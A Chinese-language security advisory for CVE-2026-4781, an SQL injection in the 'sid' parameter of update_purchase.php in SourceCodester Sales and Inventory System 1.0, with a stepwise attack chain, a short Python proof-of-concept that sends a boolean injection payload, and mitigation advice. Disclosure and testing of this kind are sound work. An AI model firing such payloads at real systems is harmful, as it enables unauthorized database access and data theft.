CVE-2026-4781 CVSS 6.3 中危

CVE-2026-4781: SourceCodester销售库存系统SQL注入漏洞

披露日期: 2026-03-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4781

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Sales and Inventory System

漏洞概述

SourceCodester Sales and Inventory System 1.0版本存在安全漏洞。该漏洞位于`update_purchase.php`文件中，由于系统未对HTTP GET参数`sid`进行严格的过滤和验证，导致攻击者可以通过构造恶意SQL语句实施SQL注入攻击。此漏洞允许远程攻击者在无需复杂用户交互的情况下，利用低权限账户获取数据库敏感信息、破坏数据完整性或影响系统可用性。

技术细节

该漏洞的根源在于`update_purchase.php`文件对用户输入的处理机制存在缺陷。当组件处理HTTP GET请求中的`sid`参数时，直接将其作为SQL查询的一部分进行拼接，而未使用参数化查询或进行有效的输入清洗。攻击者可以通过发送包含特定SQL元字符（如单引号、注释符）的请求来干扰原始查询结构。利用方式包括但不限于基于布尔的盲注、联合查询注入或时间盲注。由于CVSS向量显示攻击复杂度低且无需用户交互，该漏洞极易被自动化工具扫描并利用，导致数据库中的客户信息、库存数据等敏感资产泄露。

攻击链分析

STEP 1

1. 信息收集

攻击者使用扫描工具识别目标站点是否运行SourceCodester Sales and Inventory System 1.0。

STEP 2

2. 漏洞探测

攻击者向`update_purchase.php`发送包含特殊字符（如单引号）的`sid`参数，观察应用响应是否异常（如报错或延迟）。

STEP 3

3. 构造攻击载荷

根据探测结果，构造具体的SQL注入Payload（如UNION SELECT语句），试图提取数据库表名或敏感数据。

STEP 4

4. 执行攻击

通过HTTP GET请求发送恶意Payload，服务器后端执行恶意SQL命令，返回查询结果给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Exploit Title: SourceCodester Sales and Inventory System 1.0 - SQL Injection (sid)
# Date: 2026-03-25
# Vulnerable File: update_purchase.php

import requests

def check_sqli(url):
    # Payload to test SQL injection
    payload = "1' AND 1=1-- -"
    target_url = f"{url}/update_purchase.php?sid={payload}"
    
    try:
        response = requests.get(target_url)
        if response.status_code == 200:
            print(f"[+] Potential SQL Injection found at: {target_url}")
            print(f"[+] Response Length: {len(response.text)}")
        else:
            print("[-] Exploit failed or target not vulnerable")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    target = "http://target-ip/path"
    check_sqli(target)

影响范围

SourceCodester Sales and Inventory System 1.0

防御指南

临时缓解措施

在未安装补丁前，建议限制对`update_purchase.php`文件的访问权限（如通过IP白名单），或使用Web应用防火墙（WAF）规则过滤针对`sid`参数的恶意输入。同时，应确保数据库用户遵循最小权限原则，防止注入攻击导致服务器被完全控制。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4781
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4781
3 Details https://www.cvedetails.com/cve/CVE-2026-4781/
4 VulDB https://vuldb.com/cve/CVE-2026-4781
5 Link https://github.com/meifukun/Web-Security-PoCs/blob/main/Inventory-System/SQLi-UpdatePurchase-sid.md
6 Link https://vuldb.com/?ctiid.352799
7 Link https://vuldb.com/?id.352799
8 Link https://vuldb.com/?submit.775174
9 Link https://www.sourcecodester.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表